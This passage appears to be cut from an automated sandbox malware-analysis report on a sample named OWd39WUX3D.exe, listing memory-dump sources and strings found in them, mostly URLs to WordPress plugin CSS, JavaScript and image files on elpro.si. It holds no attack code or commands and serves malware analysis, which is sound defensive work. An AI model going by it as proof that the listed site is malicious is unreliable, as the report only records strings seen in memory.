00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/css/style.php?cssvars=bXRsaV9oZWlnaHQ9MT
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/js/mtli-str-replace.min.js?ver=3.1.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/css/style.css?ver=3
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/js/index.js?ver=2c7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/close.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/logo.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css?v
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js?ver
              Source: OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilin
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/dist/css/blocks/styles.css?ver=4.6
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 